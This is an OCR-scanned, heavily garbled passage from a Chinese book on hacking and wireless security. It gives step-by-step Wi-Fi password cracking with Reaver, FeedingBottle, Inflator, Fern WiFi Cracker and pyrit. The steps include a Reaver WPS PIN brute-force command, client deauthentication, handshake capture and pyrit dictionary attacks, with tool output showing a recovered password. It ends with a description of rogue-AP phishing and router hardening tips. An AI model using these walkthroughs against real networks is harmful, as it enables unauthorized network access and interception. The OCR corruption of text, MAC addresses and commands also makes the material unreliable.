. A 停止 
E 蔓 出 
排序 pin 码 
NS 数量 : 0 


选择 好 AP 后 单 击 Reaver 按 钮 ， 此 时 会 
弹出 一 个 Reaver 初 始 参数 列 表 对 话 框 ， 如 下 
图 所 示 。 


无 线 网 卡 路 由 MAC 名 称 “ 强 麻 信道” 加密 方式 客户 澳 MAC 
i w | | F4:83:CD:33:60:73_ 园 .. 谷 四 .8.. -110_ 6__ WPA2WPA_58:00:E3:B9-08:: 全 
wlanD Ralink 1C:FA-6B:01:2FOB_Test-001__-71_1_ WPA2WPA__wps 
RT2870/3070 rt2800usb ee 
[phyO 002FD9D97D2fD_ChinaNet5Wrc -65 13 WPA_ 
们 道 1C:60.DE;52:B4:OE_222 -65 13 WPA2 D 啤 字 志 
Ry 
AI minidwep-gtk Dy 
加 密 方式 “|‖ 请 在 下 面 方 框 中 填 入 reaver 可 选 参数 : L 启 动 
WPA/WPA2 reaver -imon1-b 1CFA68:01:2F:08 -c 1 -5 /tmp/minidwep/1CFAG8012F08,wpc 
Ca -v -n -x 20 -r 100:10-1300 
- | Reave 
4 | 全 cancal ox 
2 上 停止 
上 退出 
排序 pin 码 


IV5 致 量 : 6 


尼 动 Reaver 开 始 破 解 PIN 码 ， 
所 示 。 
— wlan0 mon1 1C:FA:68:01:2F:08 

+ tee /tmp/minidwep/1C:FA:B8:01:2F:08,109 


en re) 


Reaver v1,.4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 《cheffnerBtacnetso 
] ,com> 


Restored previous session 

Waiting for beacon from 1C:FA:69:01:2F:08 
hssociated with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
Trying pin 01235678 

Trying pin 01235678 


Trying pin 44445676 
OQ,.05% complete @ 2018-11-19 11:06:30 (8 seconds/pin) 


[+] 
[+] 
[+] 
[+] 
[+] 
[+] 
[+] 
[+] 
其 Trying pin 01235678 
[+] 
[+] 
[+] 
[+] 
[+] 
[+] 
[+] Trying pin 44445676 


8.4.4 使 用 FeedingBotle 工 具 破 解 
WEP 密 码 


使 用 FeedingBottle 破 解 WEP 密 码 可 以 使 
用 以 下 步 又 : 
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双击 FeedingBottle 图 标 司 动 软件 ， 如 


3 


下 图 所 示 。 


eedingBottle 


下 图 为 启动 后 的 界面 。 单 击 Yes 按 钮 
进入 下 一 步 。 


| 汪 央 


[step 图 在 无 线 网 卡 界 面 选择 无 线 网 卡 ， 如 下 
图 所 未 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle (ss 


iode enabled on ncrd ylsrn) 


AP 扫描 界面 选择 AP 加 密 方式 信道 等 
配置 项 ， 单 击 Scan 按 钮 启动 扫描 ， 如 下 图 
所 示 。 


一 FeedingBottle shld | 


Ignore The Error ltem of 


anning 加 


dtming Tim 


Shou 9 FP uhen 


选中 扫描 出 的 AP， 在 Clinets Information 
ee 示 出 接 入 AP 的 客户 端 信息 ， 如 下 图 
所 示 。 单 击 Next 按 钮 讲 入 下 一 步 


一 FeedingBottle Ee 


RHs [n+crmat icm 
ESSID: 1C:FA:68:01:2F :08 


样 是 使 用 aireplay-ng 进 行 发包 获 取 IVs 值 。 
如 果 没 有 获取 到 客户 端 握 手包 ， 可 以 单 击 
Deauth 按 钮 打 断 客户 端 与 AP 的 连接 ， 如 下 
图 所 示 ， 剩 下 的 时 间 等 待 足够 多 的 IVs 后 破 
解 出 密码 。 

mm FeedingBottle 


ER 


Client NAC 


IC+ED+*CJ*ES*FE+CB 


PRP REPLAY PTTACK 
POB41 REPLAY BT IALK 
本 -nprhoP _FCRGE ATTACE 


fdvanced Mode ->| 


8.4.5 ”使 用 FeedingBotle 工 具 破 解 
WPA/WPA2 密 码 
使 用 FeedingBottle 破 解 WPA/WPA2 密 码 
可 以 使 用 以 下 步骤 : 


[step 图 在 无 线 网 卡 界面 选择 无 线 网 卡 ， 如 下 
图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


Select lJireless [ard k Into Neonitor Mode 


FecdiregBottle 3,2,3 


将 加 密 方 式 切换 为 WPA/WPA2， 并 单 
击 Scan 按 钮 打 描 AP， 如 下 图 所 示 。 
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FeedingBottle 


选择 目标 AP 以 及 连接 AP 的 客户 端 ， 如 
下 图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle 


| 全 | "| 


在 破解 页 面 中 会 有 AP 的 信息 ， 
接 入 AP 客 户 端 的 信息 ， 


FeedingBottle 


以 及 
如 下 图 所 示 。 


| 信介 


| Prov | dvsrced Mede >| | 


单 击 Start 按 和 钮 ， 在 弹 出 的 对 话 框 中 选 
择 一 个 字典 文件 ， 如 下 图 所 示 。 选择 完 X 
后 单 击 OK 按 钮 。 


Dictionary File Chooser 


个 口 ed 


Shout 区 Files t*| | Favorites ey, | 


[¥ Previeu 太 Show hidden files 


Filename: | bir feadingbottle/passuword, lat 


1 Cancel | 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


step 上 加 通过 上 一 步 的 设置 ， 此 时 会 抓 取 握 手 双击 Inflator 图 标 启 动 软件 ， 如 下 图 
信息 ， 如 下 图 所 示 。 在 抓 包 过 程 中 需要 单 ”所 示 。 
击破 解 界 面 中 的 Deauth 按 钮 。 

| 位 


3P informaticon 


AP HRAL [hanne [Client MAC Er 


Jireless card infornation 


启动 后 的 界面 如 下 图 所 示 ， 单 击 Yes 
按钮 。 


Inflator 1.0(for Reaver v1.4) 个 := 


airodump-ng 


CH 1 J]L Elapsed; 24 s ][ 2018-11-13 1¢;26 


B5511 PNR Fst Beacons  #lata. #s [LH tb ENL CIPHER AUTH E 
1C:FA:BEB+:01: 呈 108 -127 各 142 vo 0 1 54e WPA2 CCHP Psk T 
B5511n STATION FUR Rate Lost Frames Probe 
1C:FA:BB:01:2F +08 DEED:CD:BB¢FE:CB -了 27 nu-B6 


step【 一 己 抓 取 到 握手 信息 后 ，FeedingBottle 
会 按照 字典 文件 开始 破解 ， 如 果 字 典 文 件 
中 没有 密码 会 提示 更 挽 字典 文件 ， 如 下 图 
所 示 。 


[step 图 从 网 卡 列表 中 选 人 如 下 图 
人 单 击 Next 按 钮 进入 下 一 


Inflator 1.0(for Reaver v1.4) "Se 


PP MAC 


lireless card jnfornaticn 
Face [ 


5elert llireless Lard & Jnto Monitor Mode 


wland EB:+dE+DO6+23:+: 不 +d6 


Passphrase not in dictionary! + 
Use arother dicticnary file? 


sp 图 破解 出 密码 后 ， 下 方 WPA Key 会 给 出 nes 
正确 的 黎 码 ， 如 下 下 图 所 示 。 


FeedingBottle ;| S| 


tp infornation 单 击 Scan for WPS enabled APs 按 钮 ， 
HP Nane AP NMAC FP Channel Client MC 
i 如 下 图 所 示 。 选 中 目标 AP， 单 击 Next 按 钮 
Car d re ee a intertace Lard MAL 1 并 入 下 cm 


WPA handshake 


Inflator 1.0(for Reaver v1.4) :Se 


3Ps Information 


Use scan model-s) 


8.4.6 ”使 用 Inflator 工 具 破 解 WPS 密 码 


使 用 Inflator 破 解 WPS 密 码 可 以 使 用 以 
下 步骤 : 
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step 图 在 破解 WPS 界 面 中 ， 可 以 看 到 下 方 同 
和 使 用 Reaver 进 行 破解 ， 同 时 给 出 了 初始 
命令 ， 如 果 需 要 额外 添加 命令 可 以 名 选 上 
ess node a 


Inflator 1.0(for Reaver v1.4) 


FP infornation 
AP Nams ”MAC 3P Channel 


hdwanced Options 

Bs | [I 
[| | ES 
[中 转 : et the delay between pin attenpts [1](-d) 
[| | 加 Set the time to wait if the hp locks UPS 


8 digit WPS pint(-p) 


Pin attempts [BOJ(-1) 


| | 国 set the M5 
| 图 5et the time to 


tineout pericd [0,.20](-1) 


sleep after 10 unexpected failures [= 
图 -i. --no-associate 图 -L --ignore-locks 图 -". --hnacl 5, —dh-small 
[| 一 -Winr 转 -E --eap-terminate 转 -N， --ho-nacks 


httack Conmand (set the options Uou want below, without "~—vw"): 


单 击 Run 按 钮 启动 Reaver 开 始 
5 如 下 图 所 示 和 


a 
Reaver v1,4 WiFi Protected Setup httack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffnerBtacnetso 
] ,com> 


台 破解 PIN 


Reaver EL] 


+] laiting for beacon from 1C:FA:68:01:2F:08 

] UWURNINE: Failed to associate with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
] WARNING: Failed to associate with 1C:FA:B8:01:2F:08 (ESSIDN: Test-001) 
] WARNING: Failed to associate with 1C:*FA:B8:01:2F:08 (ESSID: Test-001) 
] WARNING: Failed to associate with 1C:FA:68:01:2F:08 (ESSIN: Test-001) 
] fssociated with 1C:FA:68:01;2F:08 (ESSID: Test-001) 

] Trying pin 12345670 

] WARNING: Failed to associate with 1C:*FA:6B8:01:2F:08 (ESSID: Test-001) 
: WARNING: Failed to associate with 1C:FA:68:01:2F:08 (ESSIN: Test-001) 


[ 
[ 
[! 
[ 
[ 
[ 
[ 
| 
[+] Trying pin 12345670 


| 
I 
I 
I 
地 
+* 
I 
I 
专 


8.5 ”实战 演练 


实战 演练 1 一 一 使 用 Fern WiFi Cracker 
破解 AP 密 码 


对 于 喜欢 图 形 化 界面 的 用 户 来 说 ， 这 

一 和 福利 工具 ， 在 使 用 该 工具 之 前 ， 建 
议 手 动 关闭 那些 可 能 | 史 啊 程序 正常 运行 的 
进程 。 

使 用 Ferm WiFi Cracker 破 解 AP 窗 人 码 的 操 
作 步 又 如 下 : 
选择 “应 用 程序 ”菜单 列表 下 的 “无 
线 攻击 ”菜单 ， 在 无 线 攻 击 菜 单 中 有 fern 
WiFi， 如 下 图 所 示 。 
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a rcrack-ng 


)1 - 信息 收集 
洞 Pa 分 析 
W e b 程 序 COW p 口 { y 
4 - 数据 库 评估 软件 
- 密码 攻击 


ghost phis... 


- 无线 攻击 


选择 fern WiFi 选 项 ， 可 以 打开 该 工 
这 下 图 为 其 工作 界面 Le] 
Fern WIFICracker @ © 


出 wlanO pr Refresh 


Monitor Mode Enabled on wlanOmor 


( 少 Stopped 


Lm) 


| Wi WPA | 
Latest update is already installed 
Rie | 日 


| 
司 | KeyDatabase No Key Entries 
E 


8 ToolBox 
Wer 


GUI suite for wireless encryption strength testing of 802.11 wireless encryption standard access points 


Fern WIFI Crecker 27 


58 Detected 


Python Version; 2.7,15+ defau 
Aircrack Version: rcrack-no 1.4 - (C) 2 
Qt Version; 5,11,3 


About Fern WIFI Cracker 


Written by Saviour Emmanuel Ekiko Report Bugs at : savioboyz@rocketmail. com 


单 击 select Interface 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 列 表 中 选择 一 块 网 卡 ， 如 下 
图 所 示 。 


Select Interface < Refresh | 


Select an interface card 


选择 完 网 卡 后， 会 弹出 一 个 提示 框 ， 
单 击 OK 按钮 即 可 ， 如 下 图 所 示 。 
Tips - Scan settings @ 


To Access the "Settings" for the network scan preferences "Double click" 


on any area of the main window, "Scan for network button" is used to 


Y 


scan for network based on the settings options of the settings dialog 


Default is automated scan, Fake Mac-Address is always used 


Don't show this message again 
| ok | 
选择 完 网 卡 后 ， 单 击 下 方 的 “扫描 ” 
按钮 ， 开 始 扫 描 数 据 信 息 ， 如 下 图 所 示 。 


x < Refresh 


Monitor Mode Enabled on wlan0mon 


a wlanO 


(¢°)) scan for Access points 


L339 
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扫描 过 程 中 ， 在 下 方 WEP 与 WPA 按 钮 
旁 ， 会 出 现 相 应 的 数字 信息 ， 这 些 数 字 代 表 
搜索 的 AP 数 量 ， 如 下 图 所 示 。 


| ((*)) Active 
= 
Fi | wpPA 7 Detected 


单 击 WPA 按 钮 ， 即 可 进入 扫描 到 的 
AP 页 面 ， 如 下 图 所 示 。 


Attack Panel Lx] 


侈 提示 : 扫描 结果 页 面 大 致 分 为 以 下 几 个 
区 域 : 

(1) AP 列表 。 这 里 会 以 列表 的 形式 列 
出 已 经 扫描 出 的 AP， 如 下 图 所 示 。 


(()) (©) 全) (() 
Li 2: 和 | 


-DysGi ChinaNet-euKh ChinaNst-hUyV Chinanet-KTIK9F ChinaNet-PvN: 可 
2) 详细 数据 。 选 中 AP 列表 中 的 AP 以 
后 ， 下 方 会 列 出 该 AP 的 详细 信息 ， 如 下 图 
所 示 。 


WPS 方 式 破解 两 个 选项 ， 如 下 图 所 示 。 
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(4) 破解 进度 区 。 该 区 域 左 侧 显 示 破 解 
步骤 、 下 方 是 破解 进度 条 、 右 侧 有 选择 密码 
文件 按钮 以 及 客户 端 列 表 ， 如 下 图 所 示 。 


passwordlst Browse 


[step 图 选中 需要 破解 的 AP， 查 看 是 否 有 
客户 端 接 入 ， 然 后 选择 密码 文件 ， 单 击 
Browse 按 钮 ， 如 下 图 所 示 。 


password.lst 


DC:6D:CD:66:FE:CB 


单 击破 解 Attack 按 钮 ， 这 时 按钮 的 文 
本 显示 会 换 成 Stop， 如 下 图 所 示 ， 如 果 需 要 
停止 破解 ， 可 以 单 击 Stop 按 钮 。 


国 Automates 


此 时 程序 会 尝试 中 断 AP 与 客户 端的 
连接 ， 如 下 图 所 示 。 


Probing Access Point 


Deauthenticating DC:6D:CD:66:FE:CB 


Handshake Status 


当 抓 取 到 关联 信息 后 ， 开 始 破 解 ， 如 
下 图 所 示 。 而 且 抓 取 到 信息 文本 会 加 粗 颜 
色 并 变 成 黄色 来 显示 ， 没 有 抓 取 到 则 显示 
为 灰色 。 

Probing Access Point 

Deauthenticating DC:6D:CD:66:FE:CB 

Handshake Captured 


Bruteforcing WPA Encryption 


Finished 


破解 完成 后 会 提示 破解 出 的 密码 ， 如 
下 图 所 示 。 


Current Phrase 
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实战 演练 2 一 一 使 用 pyrit 工 具 破 解 AP 密 码 


pyrit 是 一 球 开 源 且 完 全 免费 的 软件 ， 任 何人 都 可 以 检查 ， 复 制 或 修改 它 。 它 在 各 种 平 
台 上 编译 和 执行 ， 包 括 FreeBSD、MacOS X 和 Linux 作 为 操作 系统 以 及 x86、alpha、arm 等 
处 理 器 。 

使 用 pyrit 工 具 最 大 的 优点 ， 在 于 它 可 以 使 用 除 CPU 之 外 的 GPU 运 算 加 速生 成 彩虹 表 ， 
本 和 喘 文 持 抓 包 获 取 四 步 握 手 过 程 ， 无 须 使 用 airodump 抓 包 ， 如 果 已 经 通过 ariodump 抓 取 数 
据 ， 也 可 以 使 用 pynit 进 行 读 取 。 

问题 : 什么 是 彩虹 表 ? 

答 : 彩虹 表 是 一 个 用 于 加 密 散 列 函 数 逆 运算 的 预先 计算 好 的 表 ， 为 破解 密码 的 散 列 值 
(或 称 哈 希 值 、 微 缩 图 、 摘 要 、 指 纹 、 哈 希 密 文 ) 而 准备 。 一 般 主流 的 彩虹 表 都 在 100GB 
以 上 。 这 样 的 表 常常 用 于 恢复 由 有 限 集 字符 组 成 的 固定 长 度 的 纯 文本 密码 。 

使 用 pyrit 命 令 ， 查 看 pyrit 工 具 的 帮助 信息 ， 如 下 图 所 示 。 


root@kali:~# pyrit 

Pyrit 696.5.1 (C) 2008-26911 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

IThis code is distributed under the GNU General Public License V3 


Usage: pyrit [options] command 


Recognized options : 


-b : Filters AccessPoint by BSSID 
-e : Filters AccessPoint by ESSID 
-h : Print help for a certain command 
-1 : Filename for input ('-' is stdin) 
-0 : Filename for output ('-' is stdout) 
-Tr : Packet capture source in pcap-format 
-U : URL of the storage-system to use 
--all-handshakes : Use all handshakes instead of the best one 
= -aeS : Use AES 

主要 参数 介绍 如 下 : 

e -b: 按 BSSID 沛 选 AccessPoint。 

e -e: 按 ESSID 过 滤 AccessPoint。 

e -h: 打印 茶 个 命令 的 帮助 。 

e -i: 输入 的 文件 名 〈' - ' 是 stdin) 。 

e -0o: 输出 的 文件 名 〈' - ' 是 stdout) 。 

e -IT: pcap 格 式 的 数据 包 捕获 源 。 

e -u: 要 使 用 的 存储 系统 的 URL。 

e --all-handshakes: 使 用 所 有 的 握手 ， 而 不 是 最 好 的 握手 。 


e aes: 使 用 AES。 

pyrit 工 具 可 识别 的 命令 如 下 : 

analyze: 分 析 数 据 包 捕 获 文件 。 

attack batch: 攻击 从 数据 库 的 PMKs /密码 握手 。 
attack cowpatty: 攻击 一 个 来 自 cowpatty 文 件 的 PMK 握 手 。 
attack db: 攻击 与 数据 库 中 的 PMK 握 手 。 
attack passthrough: 用 文件 中 的 密码 攻击 握手 。 
batch: 批 处 理 数 据 库 。 

benchmark: 确定 可 用 内 核 的 性 能 。 

benchmark long: 更 长 和 更 准确 的 基准 版 本 。 
check db: 检查 数据 库 是 否 有 和 错误。 
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create_essid: 创建 一 个 新 的 ESSID。 

delete essid: 从 数据 库 中 删除 一 个 ESSID。 

eval: 计算 可 用 密码 和 匹配 结果 。 

export cowpatty: 将 结果 导出 到 新 的 cowpatty 文 件 。 
export hashdb: 将 结果 导出 到 airolib 数 据 库 。 

export passwords: 将 密码 导出 到 文件 。 

help: 打印 一 般 帮 助 。 

import passwords: 从 类 文件 源 导 入 密码 。 

import unique passwords: 从 类 文件 源 导 入 唯一 密码 。 
list_cores: 列 出 可 用 的 核心 。 

list essids: 列 出 所 有 ESSID， 但 不 计 入 匹配 结果 。 
passthrough: 计算 PMK 并 将 结果 写 入 文件 。 

relay: 通过 RPC 中 继 一 个 存储 URL。 

selftest: 测试 硬件 以 确保 其 计算 正确 的 结果 。 
serve: 为 其 他 pyrit 客 户 提供 本 地 硬件 。 

strip: 将 数据 包 捕获 文件 剥离 到 相关 数据 包 中 。 
stripLive: 捕获 来 目 现场 捕获 源 的 相关 数据 包 。 
verify: 通过 重新 计算 ， 验 证 结果 的 10%。 

使 用 pyrit 进 行 破解 无 线路 由 器 密码 的 操作 步骤 如 下 : 
使 用 pyrit -r wlan0mon -o wpa.cap stripLive 命 令 ， 开 始 抓 取 数据 包 ， 如 下 图 所 示 。 
root@kali:-~# pyrit -r wLangmon -0 wpa.cap stripLive 
Pyrit 96.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 


https://github.com/JPaulMora/Pyrit 
This code is distributed under the GNU General Public License v3+ 


Parsing packets from 'wLangmon' 

1/1: New AccessPoint 50:2b:73: re 72: 50 (' 哇 味 味 1 这 里 没 WiFi 哦 1! ， 
2/2: New AccessPoint e4:68:a3:7d:37:92 ('CMCC-X] ' ) 

3/3: New AccessPoint f4:83:cd:33:60:73 (' ! 

3/7: New Station 30:84:54:d6:ca:b9 (AP e4:68:a3:7d:37:92) 
4/8: New AccesspPoint 94:88:5e:0a:1b:82 ('g@ 引 人 98 ' ) 

5/12: New AccessPoint 86:83:cd:33:60:73 ('TPGuest 6073 ' ) 
6/17: New AccessPoint lc:fa:68:01:2f:08 ('Test-001') 
7/27: New AccessPoint e4:68:a3:7d:37:90 ('CMCC') 

8/29: New AccessPoint e4:68:a3:7d:37:91 ('and-Business') 
9/39: New AccessPoint e4:68:a3:7d:37:95 ('A') 


使 用 pyrit -r wpa.cap analyze 命 令 ， 对 抓 取 到 的 数据 包 进 行 分 析 ， 如 下 图 所 示 。 可 以 
看 到 ，Test-001 这 个 路 由 有 四 步 握 手 的 过 程 。 


root@kali:~# pyrit -r wpa.cap analyze 

Pyrit 0.5.1 (C) 2008-20]1]1 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License V3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 802.11-packets)，got 41 AP(S) 
#24: AccessPoint lc:fa:68:01:2f:08 ('Test-001' ) : 
#1: Station dc:6d:cd:66:fe:cb，2 handshakel(Ss) : 
#1: HMAC SHA1L AES, good*, spread 1 
#2: HMAC SHA1L AES, workable*, spread 25 
#25: AccessPoint e4:68:a3:7Cc:85:31 ('and-Business'): 


如 果 想 要 使 用 ariodump 抓 取 的 数据 包 ， 可 以 使 用 pyrit -r 001-01.cap -o pyritwpa.cap 
strip 命 令 ， 将 airodump 的 数据 包 做 一 个 格式 转换 ， 如 下 图 所 示 。 
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root@kali:-~# pyrit -r 901-01.cap -0 pyritwpa.cap strip 

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file '001-01.cap' (1/1)... 
Parsed 53 packets (53 802.1l-packets), got 1 AP(s) 


#1: AccessPoint 1lc:fa:68:01:2f:08 ('Test-001') 
#0: Station dc:6d:cd:66:fe:cb, 1 handshake(s) 
#1: HMAC SHA1L AES, good*, spread 1 


New pcap-file 'pyritwpa.cap' written (17 out of 53 packets ) 


使 用 pynit -T< 抓 取 的 数据 包 文 件 >-i< 密 码 文 件 >-b<AP-MAC 地 址 > attack passthrough 命 
令 ， 开 始 破解 窗 码 ， 这 里 破解 出 的 客 码 为 Password， 如 下 图 所 示 。 


rootGkaLi:~# pyrit -r wpa.cap -i /usr/share/john/password.lst -b lc:fa:68:01:2f:08 
attack passthrough 

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 802.11-packets)，got 41 AP(s) 


Tried 647 PMKs so far; 718 PMKs per second,. #!comment: This List has been compiled 
by Solar Designer of Ope 


The password is 'Password'. 


8.6 “小 试 身 手 


练习 1: 熟悉 aircrack-ng 工 具 套 件 。 

练习 2: 使 用 aircrack-ng 破 解 WEP、WPA 以 及 WPS 密 码 。 
练习 3: 使 用 图 形 化 工具 破解 WEP 密 码 。 

练习 4: 使 用 CDlinux 系 统 工 具 破 解 无 线路 由 器 密码 。 
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通过 扫描 探测 可 以 发 现 附近 AP 信息 ， 通 过 这 些 AP 信 息 可 以 虚拟 出 一 个 与 AP 信息 完全 
相同 的 AP， 这 样 做 可 以 实现 信息 过 滤 ， 也 能 在 一 定 程 度 上 起 到 保护 AP 的 作用 。 


9.1 虚拟 AP 技术 


虚拟 AP 技术 相当 于 使 用 计算 机 设备 
通过 软件 模拟 AP， 通 过 计算 机 可 以 设置 
DHCP 服 务 器 ， 接 入 AP 的 网 络 设备 通过 计 
算 机 共享 上 网 。 


湾 吕 9.1.1 认识 虚拟 AP 技术 


Oa 
Ts 
虚拟 AP 技术 从 Windows 7 操作 系统 开始 
就 存在 了 。 要 想 实现 虚拟 AP， 需 要 用 户 的 
计算 机 准备 两 块 网 卡 ， 一 块 有 线 网 卡 ， 一 
块 无 线 网 卡 ， 其 中 ， 有 线 网 卡 用 来 上 网 ， 
无 线 网 卡 用 来 发 射 信号 。 这 样 一 旦 有 设备 
接 入 虚拟 AP， 就 可 以 通过 抓 包 的 方式 来 查 
看 该 设备 的 网 络 通信 数据 了 。 
虚拟 AP 技术 主要 是 用 来 网 络 共 享 的 ， 
如 果 当 前 只 能 一 台 计 算 机 上 网 ， 这 个 方 
法 可 以 实现 不 同 设备 共享 计算 机 的 有 线 网 
络 ， 但 同时 也 可 能 成 为 黑客 恶意 攻击 的 一 
种 方法 。 当 然 随 着 无 线 网 的 发 展 ， 虚 拟 AP 
己 经 由 主要 的 网 络 共享 转变 为 多 种 功能 ， 
例如 通过 接 入 虚拟 AP 来 抓 取 网 络 数 据 包 ， 
对 于 网 络 分 析 是 非常 有 帮助 的 。 
除 Windows 系 统 可 以 虚拟 AP 外 ，Kali 
Linux 系 统 同 样 也 可 以 虚拟 AP， 并 且 通 过 
Kali Linux 系 统 还 可 以 完全 模拟 AP 的 整个 转 
下 9.1.2 ”防范 虚拟 AP 的 钓鱼 攻击 
家 。 。 伪 AP 钓 鱼 攻 击 ， 是 通过 仿照 正常 的 


”AP， 拱 建 一 个 伪 AP， 然 后 通过 对 合法 AP 进 
行 拒绝 服务 攻击 或 者 提供 比 合法 AP 更 强 的 


Ny 
1 


信号 ， 迫 使 无 线 客户 问 连 接 到 伪 AP， 这 是 
因为 无 线 客 户 端 通常 会 选择 信号 比较 强 或 
者 信 品 比 (SNR) 低 的 AP 进行 连接 。 

为 了 使 客 尸 端 连接 达到 无 颖 切换 的 效 
条， 伪 AP 应 该 以 桥接 方式 连接 到 另外 一 个 
网 络 。 如 果 成 功 进行 了 攻击 ， 则 会 完全 控制 
无 线 客户 跨 网 络 连接 ， 并 且 可 以 发 起 任何 进 
一 步 的 攻击 。 发 起 无 线 钓鱼 攻击 的 黑客 一 般 
会 采取 以 下 步骤 来 最 终 控 制 终 站 设 备 。 


1. 获取 无 线 网 络 的 客 铀 


对 于 采用 WEP 或 WPA 认 证 的 无 线 网 
络 ， 黑 客 可 以 通过 无 线 破解 工具 ， 或 者 采用 
社会 工程 的 方法 ， 来 镭 取 目标 无 线 网 络 的 密 
钥 ， 对 于 未 加 密 的 无 线 网 络 则 可 以 省 略 这 一 
步 又， 使 得 无 线 钓 鱼 攻击 更 容易 得 手 。 


2. 伪造 目标 无 线 网 络 


用 户 终端 在 接 入 一 个 无 线 网 络 之 前 ， 
系统 会 自动 扫描 周围 环境 中 是 否 存在 曾 
经 连接 过 的 无 线 网 络 。 当 存在 这 样 的 网 
络 时 ， 系 统 会 自动 连接 该 无 线 网 络 ， 并 自 
动 完成 认证 过 程 ; 当 周 围 都 是 陌生 的 网 络 
时 ， 需 要 用 户 手工 选择 一 个 无 线 网 络 ， 并 
输入 该 网 络 的 密 钥 ， 完 成 认证 过 程 。 

黑客 在 伪造 该 无 线 网 络 时 ， 在 目标 无 
线 网 络 附近 架设 一 台 相 同 或 近似 SSID 的 
AP， 并 设置 之 前 鳃 取 的 无 线 网 络 密 钥 ， 这 
台 伪 AP 一 般 会 设置 成 可 以 桥接 的 软 AP， 因 
此 更 加 隐蔽 ， 不 容易 被 人 发 现 ， 这 样 ， 黑 
客 伪造 AP 的 工作 就 完成 了 。 

由 于 伪造 的 AP 采用 了 相同 的 SSID 和 


网 络 密 钥 ， 对 用 户 来 说 基本 上 很 难 进行 
辨别 ， 并 且 由 于 伪造 AP 使 用 了 高 增益 天 
线 ， 附 近 的 用 户 终 端 会 接收 到 较 强 的 无 线 
信号 ， 此 时 在 用 户 终 端 上 的 无 线 网 络 列 表 
中 ， 这 个 伪造 的 AP 要 优 于 正常 AP 排 在 靠 前 
的 位 置 。 这 样 ， 用 户 就 很 容易 上 当 ， 掉 入 
这 个 被 精心 构造 的 陷阱 中 。 


3. 干扰 合法 无 线 网 络 


对 于 那些 没有 自动 上 钓 的 移动 终端 ， 
为 了 使 其 主动 走 进 布 好 的 陷阱 ， 黑 客 会 对 
附近 合法 的 网 络 发 起 无 线 攻 击 ， 使 得 这 些 
无 线 网 络 处 于 瘫痪 状态 。 这 时 ， 移 动 终 端 
会 发 现 原 有 无 线 网 络 不 可 用 ， 重 新 扫描 无 
线 网 络 ， 并 主动 连接 附近 无 线 网 络 中 信号 
强度 最 好 的 AP。 

由 于 其 他 AP 都 不 可 用 ， 并 且 黑 客 伪 
造 的 钓鱼 AP 信号 强度 又 比较 高 ， 移 动 终端 
会 主动 与 伪造 的 AP 建立 连接 ， 并 获取 IP 地 
址 。 至 此 ， 无 线 钓鱼 的 过 程 就 完成 了 。 


4. 截获 流量 或 发 起 进一步 攻击 


无 线 钓鱼 攻击 完成 后 ， 移 动 终端 就 与 
黑客 的 攻击 系统 建立 了 连接 ， 由 于 黑客 采 
用 了 具有 桥接 功能 的 软 AP， 可 以 将 移动 终 
端的 流量 转发 至 Internet， 因 此 移动 终端 仍 
能 继续 上 网 ， 但 此 时 ， 所 有 数据 已 经 被 黑 
客 尽 收 眼 底 。 

黑客 会 捕获 这 些 数据 并 进一步 处 理 ， 
如 果 使 用 中 间 人 攻击 工具 ， 甚 至 可 以 截获 
采用 了 SSL 加 密 的 g-mail 邮 箱 信 息 ， 而 那些 
未 加 密 的 信息 更 是 一 览 无 余 。 

更 进一步 ， 由 于 黑客 的 攻击 系统 与 被 
钓鱼 的 终端 建立 了 连接 ， 黑 客 可 以 寻找 可 
利用 的 系统 漏洞 ， 并 截获 终端 的 DNSVURL 
请 求 ， 返 回 攻击 代码 ， 给 终端 植 入 木马 ， 
达到 最 终 控制 用 户 终端 的 目的 。 此 时 ， 连 
接 在 终端 的 设备 可 能 被 黑客 完全 控制 ， 致 
使 危害 进一步 扩大 。 
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9.1.3 无线 网 络 安全 建议 


针对 当前 无 线 网 络 的 安全 问题 ， 下 面 吴 二 


(1) 不 要 随意 接 入 免费 WiFi 设备 ， 这 
种 情况 下 用 户 的 所 有 个 人 信息 ， 包 括 账号 
密码 直接 可 以 被 拦截 并 狠 取 。 

(2) 计算 机 或 者 手机 尽量 安装 安全 软 
件 ， 这 样 可 以 最 大 程度 减低 安全 风险 。 

(3) 修改 无 线路 由 器 默认 管理 账户 ， 
不 要 使 用 admin 或 root 等 明显 字眼 。 

(4) 设置 无 线路 由 器 的 加 密 方 式 为 
WPA/WPA2。 因 为 如 果 是 WEP 加 密 方 式 ， 
无 论 密码 多 长 ， 都 会 很 容易 被 破解 。 

(5) 设置 安全 强度 比较 大 的 无 线 WiFi 
密码 ， 最 好 包含 数字 、 字 母 、 大 小 写 、 特 
殊 字 符 等 ， 并 且 需 要 10 位 以 上 的 组 合 ， 例 
如 WQXwodQ#…。 

(6) 开启 MAC 地 址 过 滤 功 能 ， 只 绑 定 
自己 的 手机 、 计 算 机 、 平 板 计算 机 等 ， 如 
果 是 陌生 人 想 要 加 入 自己 的 无 线路 由 器 ， 
需要 授权 后 ， 才 可 以 连接 。 

(7) 开启 家 长 控制 功能 ， 只 允许 本 地 
主机 的 MAC 地 址 管理 无 线路 由 器 。 

(8) 关闭 DHCP 服务 。 这 样 即 便 密码 
泄露 ， 大 部 分 的 黑客 也 无 法 获取 IP 地 址 。 

(9) 关闭 WPS 功能 。 这 个 非常 重要 ， 
